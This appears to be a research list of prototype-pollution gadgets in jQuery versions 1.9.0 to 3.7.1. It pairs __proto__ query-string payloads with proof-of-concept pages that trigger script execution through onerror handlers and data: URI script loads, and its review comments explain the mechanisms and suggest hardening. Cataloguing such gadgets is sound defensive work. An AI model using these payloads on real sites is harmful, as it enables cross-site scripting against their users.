URL: https://jquery.com/
return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')
- Can be exploited through String.prototype
?__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%3dalert(document.domain)>
<!--
  Demonstration page for jQuery 3.3.1. The inline script stands in for a
  prototype-pollution bug elsewhere on the page: it writes preventDefault,
  handleObj and delegateTarget directly onto Object.prototype, then makes an
  ordinary $(document).off('foobar') call. delegateTarget holds an HTML string
  with an onerror handler; the alert is the visible marker that it ran.
  NOTE(review): presumably .off() mistakes its string argument for an event
  object because of the inherited properties. Verify against the jQuery
  source for the version in use.
  Defensive reading: the .off() call itself contains no attacker data. The
  fix belongs at the code that lets request keys such as __proto__ reach a
  merge or assignment, or in hardening such as Object.freeze(Object.prototype)
  early in page load.
-->
<script/src=https://code.jquery.com/jquery-3.3.1.js></script>
<script>
Object.prototype.preventDefault='x'
Object.prototype.handleObj='x'
Object.prototype.delegateTarget='<img/src/onerror=alert(1)>'
/* No extra code needed for jQuery 1 & 2 */
$(document).off('foobar');
</script>
?__proto__[div][0]=1&__proto__[div][1]=<img src onerror%3dalert(1)>
<!--
  Demonstration page for jQuery 3.3.1. The first inline script simulates the
  polluted state: an array stored under the key "div" on Object.prototype,
  whose second element is an HTML string with an onerror handler.
  NOTE(review): the key matches the tag name built in the second script, so
  jQuery presumably looks the tag name up in a plain-object table while
  parsing HTML. Confirm in the jQuery source.
-->
<script/src=https://code.jquery.com/jquery-3.3.1.js></script>
<script>
Object.prototype.div=['1','<img src onerror=alert(1)>']
</script>
<!--
  Trigger: building an element from a constant HTML string. The string passed
  to $() is fixed and harmless, so auditing call-site arguments alone will not
  find this. The polluted prototype is the input.
-->
<script>
$('<div x="x"></div>')
</script>
- Can also be used with `$.post`, `$.ajax`, `$.getJSON`
- Can be exploited through Boolean.prototype
?__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script
<!--
  Demonstration page for jQuery 3.5.1. The first inline script simulates the
  polluted state: "url" (a one-element array holding a data: URI) and
  "dataType" ('script') are set on Object.prototype.
-->
<script src=https://code.jquery.com/jquery-3.5.1.js></script>
<script>
Object.prototype.url = ['data:,alert(1)//'];
Object.prototype.dataType = 'script';
</script>
<!--
  Trigger: $.get / $.post with a hard-coded URL. The gadget shows that the
  inherited url and dataType values end up in the request settings, so the
  URL written at the call site no longer determines what is fetched or how
  the response is treated.
  Defensive reading: a constant URL argument is not a guarantee once
  Object.prototype is writable by request data. Block __proto__,
  constructor and prototype keys in whatever parses the query string.
-->
<script>
$.get('https://google.com/');
$.post('https://google.com/');
</script>
?__proto__[src][]=data:,alert(1)//
<!--
  Demonstration page for jQuery 3.5.1. The first inline script simulates the
  polluted state: "src" on Object.prototype is a one-element array holding a
  data: URI.
  NOTE(review): presumably the inherited "src" is picked up when jQuery
  builds the script element for $.getScript. Confirm in the jQuery source.
-->
<script src=https://code.jquery.com/jquery-3.5.1.js></script>
<script>
Object.prototype.src = ['data:,alert(1)//']
</script>
<!--
  Trigger: $.getScript with a hard-coded URL. The call-site argument is
  constant. The attacker-influenced value arrives only through the prototype.
-->
<script>
$.getScript('https://google.com/')
</script>
- Can be exploited through Boolean.prototype
?__proto__[url]=data:,alert(1)//
<!--
  Demonstration page for jQuery 3.3.1. The first inline script simulates the
  polluted state: "url" on Object.prototype is a plain string holding a data:
  URI. Only this one property is set in this snippet.
-->
<script/src=https://code.jquery.com/jquery-3.3.1.js></script>
<script>
Object.prototype.url = 'data:,alert(1)//'
</script>
<!--
  Trigger: $.getScript with a hard-coded URL. The gadget shows the inherited
  "url" taking effect in place of the call-site argument, so a script load
  whose URL looks constant in review can still be redirected.
-->
<script>
$.getScript('https://google.com/')
</script>
?__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x
<!--
  Demonstration page for jQuery 1.10.0 (loaded from cdnjs). The first inline
  script simulates the polluted state: "context" holds an HTML string with an
  onerror handler, and "jquery" is set to a dummy value.
  NOTE(review): "jquery" is the property name jQuery objects carry their
  version under (see the fingerprint check on this page), so setting it
  presumably makes a plain object pass for a jQuery collection. Verify
  against the 1.10.0 source.
-->
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/1.10.0/jquery.js></script>
<script>
Object.prototype.context = '<img/src/onerror=alert(1)>';
Object.prototype.jquery = 'x';
</script>
<!--
  Trigger: jQuery.get with a hard-coded URL and no options object. The
  call site passes nothing attacker-controlled.
-->
<script>
jQuery.get('http://google.com/');
</script>
- Can be exploited through Boolean.prototype
?__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]=
<!--
  Demonstration page for jQuery 3.6.0 (loaded from cdnjs). The first inline
  script simulates the polluted state: "url" (a data: URI string), "dataType"
  ('script') and "crossDomain" (empty string, which is falsy) on
  Object.prototype.
  NOTE(review): this snippet sets crossDomain in addition to the two
  properties used in the 3.5.1 snippet on this page. Presumably it is needed
  to keep the request on the same-origin script path. Confirm in the jQuery
  source.
-->
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.js></script>
<script>
Object.prototype.url = 'data:,alert(1)//';
Object.prototype.dataType = 'script';
Object.prototype.crossDomain = '';
</script>
<!--
  Trigger: $.get / $.post with a hard-coded URL. The snippet targets 3.6.0, so
  a jQuery upgrade does not replace fixing the pollution source itself.
-->
<script>
$.get('http://google.com/');
$.post('http://google.com/');
</script>
- Sets the attribute of an element
?__proto__[OnError]=alert(1)&__proto__[SRC]=fakeimagewontload
<!--
  Demonstration page for jQuery 3.6.0. The target is an existing img element
  with a valid src. The first inline script simulates the polluted state:
  "OnError" and "SRC" (written in mixed and upper case) on Object.prototype.
-->
<img id="test" src=realimage.jpg>
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.js></script>
<script>
Object.prototype.OnError = 'alert(1)';
Object.prototype.SRC = 'fakeimagewontload.jpg';
</script>
<!--
  Trigger: .attr() called with an object literal that only sets width. As the
  inline comment below says, the literal inherits the polluted keys, so they
  are applied as attributes too.
  Defensive reading: any API that enumerates a caller-supplied options object
  is exposed the same way. Objects created with Object.create(null), or own-key
  checks (Object.hasOwn), do not see inherited keys.
-->
<script>
$('#test').attr({"width":"100%"}) // The {} is being polluted with extra attributes
</script>
- Requires user interaction
- Can be exploited through Function.prototype
?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(1)>&__proto__[focus]=x&__proto__[needsContext]=x
<!--
  Demonstration page for jQuery 3.7.1 with a small form (#search) holding one
  input (#y). The first inline script simulates the polluted state: "handler"
  and "selector" as one-element arrays (selector holds an HTML string with an
  onerror handler), "delegateType" set to "focus", and "needsContext".
  NOTE(review): the query-string form listed just before this snippet sets a
  key named "focus", while this script sets "delegateType" to "focus". The
  two do not match. Confirm which one is intended.
-->
<script src=https://code.jquery.com/jquery-3.7.1.js></script>
<form id="search">
<input id="y" />
</form>
<script>
Object.prototype.handler = ["x"];
Object.prototype.selector = ["<img/src/onerror=alert(1)>"];
Object.prototype.delegateType = "focus";
Object.prototype.needsContext = "x";
</script>
<!--
  Trigger: registering a submit handler on the form. The page marks this
  gadget as requiring user interaction. Presumably the polluted values are
  only read when an event is dispatched on the form. Confirm in the jQuery
  source.
-->
<script>
$("#search").submit(() => {});
</script>
?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(1)>&__proto__[needsContext]=x
<!--
  Demonstration page for jQuery 1.9.0 with a nested div (#search). Unlike the
  other snippets on this page, the polluted state is set on Function.prototype
  rather than Object.prototype: "handler" and "selector" as one-element arrays
  (selector holds an HTML string with an onerror handler) and "needsContext".
-->
<script src=https://code.jquery.com/jquery-1.9.0.js></script>
<div id="search">
<div>Test</div>
</div>
<script>
Function.prototype.handler = ["x"];
Function.prototype.selector = ["<img/src/onerror=alert(123)>"];
Function.prototype.needsContext = "x";
</script>
<!--
  Trigger: binding a click handler with .on(). The handler passed is a
  function, so it inherits the properties set above.
  NOTE(review): presumably jQuery reads handler/selector off the function it
  is given. Confirm in the 1.9.0 source.
  Defensive reading: hardening Object.prototype alone does not cover this
  variant. Pollution of other built-in prototypes needs the same treatment.
-->
<script>
$("#search").on("click", () => {});
</script>